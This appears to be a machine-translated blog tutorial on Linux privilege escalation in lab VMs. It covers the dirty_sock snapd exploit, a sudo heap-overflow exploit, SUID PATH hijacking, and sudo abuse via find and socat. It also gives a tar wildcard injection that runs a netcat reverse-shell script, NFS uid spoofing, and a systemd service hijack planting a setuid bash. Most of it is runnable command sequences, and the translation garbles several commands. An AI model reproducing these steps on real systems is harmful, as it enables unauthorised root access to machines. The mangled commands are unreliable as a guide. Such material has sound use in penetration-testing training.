Common commands are briefly mentioned here

If you feel slow to download the official website, you can download the link from my Baidu web disk: pan.baidu.com/s/1uq-wQUIs… Extraction code: PANX

The owASP_BROKEN_web_apps_vm_1.2 environment uses the root user by default, so I have added a new user to it.

# add user xunmi and set the default command line to bash.
useradd -s /bin/bash -m xunmi
# set password for xunmi user (recommend setting a simple password for our own use)
passwd xunmi
# create xunmi home directory
mkdir /home/xunmi
# Transfer permissions to Xunmi
chown -R xunmi:xunmi /home/xunmi
Copy the code

There are some problems with the default keyboard and network environment of the security_v1.0 environment, so we need to configure it.

# select * from user root where user root is used.
sudo awk 'BEGIN {system("/bin/bash")}'
# Modify the keyboard layout
# Default \ symbol is shift+2
vim /etc/default/keyboard
# change XKBLAYOUT to us
Run the following command to restart the service
setupcon
Configure the nic.
vim /etc/netplan/50-cloud-init.yaml
Change enp0S3 to ENS33
Exit the configuration and restart the service
netplan apply
# Cut back to our regular users for convenience after lifting weights test
su - bob
Copy the code

This is a Linux package manager SNAP local entitlement vulnerability, targeting some Ubuntu systems

Ubuntu Version: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS Snap Version: 2.28 < SNAPd < 2.37

Vulnerability detection: snap –version Check whether the current version is within the specified range attack payload: github.com/initstring/… (v1: send the target key to the specified email address, v2: create a dirty_sock user with all sudo permissions!)

# here we use version V2
# empowerment first
chmod 777 dirty_sockv2.py
# in the use of
python3 dirty_sockv2.py
You can log in to the dirty_sock user (password is also dirty_sock)
su - dirty_sock
You can use sudo to run any command as the root user.
sudo su
Copy the code

Sudo 1.8.2~1.8.31 P2, SUDO 1.9.0~1.9.5 P1

Vulnerability detection:sudoedit -s /Error messagesudoeditThis risk may exist at the beginning if theusageAt the beginning, there is no risk. In addition to these two cases, there may be an error due to the lack of permission to use sudo!



Download address: Github.com/blasty/CVE-…

The conditions for using this vulnerability are relatively strict. First of all, we need users to have certain sudo permissionssudo -lSecondly, a security mechanism of Linux also has a great impact on the exploitation of this vulnerability. This security mechanism causes the service to be in a different memory area each time it is started. However, this vulnerability can only be exploited by knowing the memory offset of our SUdo service. The exploit script below allows us to use brute force to find Sudo’s location.

Download address: Github.com/lockedbyte/…

This script is also relatively simple to use, but it should be noted that this script should be written in the Windows environment, I uploaded to Linux when there are some coding problems, hint/bin/bash^M: bad interpreter: No such file or directoryIf you have similar problems, you need to change the code first

# First vim opens the file we need to execute
vim exp.sh
# Edit file, execute
:set ff=unix
# exit edit
:wq
Run the script
./exp.sh
Copy the code

The script will then begin the exhaustive attack.

I am inCommon Linux penetration test commandsLinux has several special permissions, which are mainly used for owner runningsetuidAnd the owner groupsetgidIf we know that the owner or owner group of the executable file that has been run by the owner or owner group has administrator rights and will call those commands, we can try to align the command to do the replacement processing to achieve the purpose of raising the rights.



So let’s say I have a file like this,

#include<unistd.h>
#include<stdlib.h>
void main(){
        setuid(0);
        setgid(0);
        system("ps");
}
Copy the code

We compiled it into an executable and gave it to the owner to execute!

GCC ps.c -O test CHmod 4777 test LS -LCopy the code

The above condition is just a test condition I set up. Under normal circumstances, if you encounter a similar situation, you can try this execution method

# find the above method of such a file
# from root (/), find owner (4000) or owner group (2000) or both owner and owner group (6000) file (f), and automatically delete all errors (2>/dev/null, 2 is all error messages,/dev/null is an empty file in Linux)
find / -perm -4000 -type f 2>/dev/null
# Detailed information version
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
Copy the code

From the owner execution file above, we can see that the target invokes the ps command, at which point we can use the environment variable to replace the file that the target wants to execute with the command that we want to execute

If the current user does not have his/her own folder, create a temporary folder in/TMP.
echo "/bin/bash" > ps
# give weights to the photoshop files we created
chmod 777 ps
# Add environment variables (currently my ps is in /home/bob!)
export PATH=/home/bob:$PATH
Copy the code

Suid command summary site (gtfobins): gtfobins.github.io/#+suid

In addition to the above use, we can also find some system commands to use, such as the following we find the owner of the execution filetasksetCommand, at this time we can use the vulnerability of this command to raise rights



Taskset Indicates the taskset command: Gtfobins. Making. IO/gtfobins/ta…

The prerequisite for sudo abuse is that you know the plaintext password of the current logged-in user!

In Linux, most of the commands can only be used by the administrator. If you want to execute some administrator commands without logging in to the administrator account, you need to use the sudo permission. If you have all the sudo permission, you are basically the same as the Root user. usesudo -lCommand to view the permissions of the current user. The following two types of prompts are all sudo permissions and none sudo permissions respectively.



If the user you have found has all the sudo permissions, then congratulations, Bao CAI, you have a ghost. The inputsudo suCommand to get root, but normally I wouldn’t be so lucky.

Most of the time, we’ll probably run into something like the following that tells us what permissions the current user has to execute with sudo. If you pick up another ghost, there is/bin/bashor/bin/shSuch orders can also be directly raised power.



Sudo will most likely give the user the power, except in the case of a ghost picked up abovefindPermissions are easy for users to find, orftp.git“And so on.

Collection of Option Orders Website (GTFobins): gtfobins.github.io/#+sudo

For example, we usefindRight to mention

# https://gtfobins.github.io/gtfobins/find/#sudo
# in the current directory (.) Run (-exec)/bin/bash and exit (-quit); Means to execute another command,\ is; The escape character of
sudo find . -exec /bin/bash \; -quit
# socat will also work, and I won't demonstrate the rest
# stdin is standard input
sudo socat stdin exec:/bin/sh
Copy the code

To exploit this vulnerability we need to know a feature of Linux if we have a name forParameters -File, and the original parameters conflict! As shown below, I created a file named--helpFile, but I usecat --helpUnable to view the file, the help command is triggered.



Here we use MSF to generate a local rebound command

This command generates a rebound shell commandMsfvenom -p CMD/Unix /reverse_netcat lhost=127.0.0.1 lport=8888 RIf you do not execute the above command, you can use my generated commandmkfifo /tmp/mpuo; Nc 127.0.0.1 8888 0 < / TMP/mpuo | / bin/sh > / TMP/mpuo 2 > &1; rm /tmp/mpuoCopy the code

In the above scheduled task, we found that our current user’s directory is among the files that are regularly backed up

# A scheduled task for each execution
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
/home = /home = /home = /home = /home = /home = /home = /home = /home = /home
for i in $(ls /home)
# Then the CD goes to Bob's home directory
cd /home/bob
Back up all files in Bob's home directory.
/bin/tar -zcf /etc/backups/home-bob.tgz *
Copy the code

Exploit:

Write the generated local rebound shell command to the script
echo "mkfifo /tmp/mpuo; Nc 127.0.0.1 8888 0 < / TMP/mpuo | / bin/sh > / TMP/mpuo 2 > &1; rm /tmp/mpuo" > shell.sh
Execute a script
echo > "--checkpoint=1"
# execute the script target (execute the shell script, the bounce command we generated above)
echo > "--checkpoint-action=exec=sh shell.sh"
After the above command is created, the package command will look like the following when the backup package is executed again
# tar -zcf /etc/backups/home-bob.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh shell.sh
# Listen to our rebound interface
nc -lvvp 8888
Copy the code

If we first write files to the host of the other party, we can forge the user of the host of the other party to achieve this. Firstly, according to the above information obtained when we map files, the target mapping file belongs to Peter user, and the uid and GID of this user are 1001 and 1005. We create a similar user locally

Select * from user where username = 'Peter' and username = '1005';
groupadd -g 1005 peter
Create Peter user and add it to Peter group
adduser peter -uid 1001 -gid 1005
# Check Peter's information
cat /etc/passwd |grep peter
Copy the code

The file can then be written to the target machine

In fact, the systemd privilege is similar to the file special privilege mentioned above. First, we still need to find a target that can be executed with the super administrator province, which I use here/lib/systemd/systemUnder thedebug.serviceBecause we are currentlypeterThe user is aligned with writable permissions.



View this service configuration can be seen, the current service will be super administrator (root) province to execute a file, then we just change the target file we want to execute the command, and restart the service can!

Go back to the user's home directory
cd ~
# escape \n like character (-e), copy /bin/bash to /home/peter/admin console, and give it 6755
Save it in an 'administrator console.sh' file and give it execution permission
echo -e '#! /bin/bash \ NCP /bin/bash /home/pett/admin console \nchmod 6755 /home/pett/admin console '> /home/peter/Administrator console sh && chmod +x Administrator console shModify the debug configuration file
vim /lib/systemd/system/debug.service
# ExecStart= assign to/home/peter/Admin console. shCopy the code

But after the restart of the service on the need for other means, is not in line to wait for the administrator that day to restart the system! After a reboot, we should see something like the followingAdministrator consoleThis is not a direct executionAdministrator consoleInstead, we need to execute/ Administrator console -pTo obtain root privileges!